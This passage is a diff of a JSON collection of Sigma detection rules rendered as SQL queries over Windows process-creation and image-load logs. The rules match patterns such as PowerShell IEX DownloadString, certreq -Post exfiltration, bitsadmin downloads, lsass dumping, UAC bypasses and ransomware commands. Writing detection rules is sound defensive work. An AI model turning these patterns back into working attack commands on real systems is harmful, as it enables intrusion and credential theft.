Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", + "status": "test", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - 
"attack.defense_evasion", - "attack.t1036.007" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE 
'%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the 
pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "The CrachMapExec pentesting framework 
implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": 
"4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE 
'%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": 
[ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. 
through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": 
[ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' 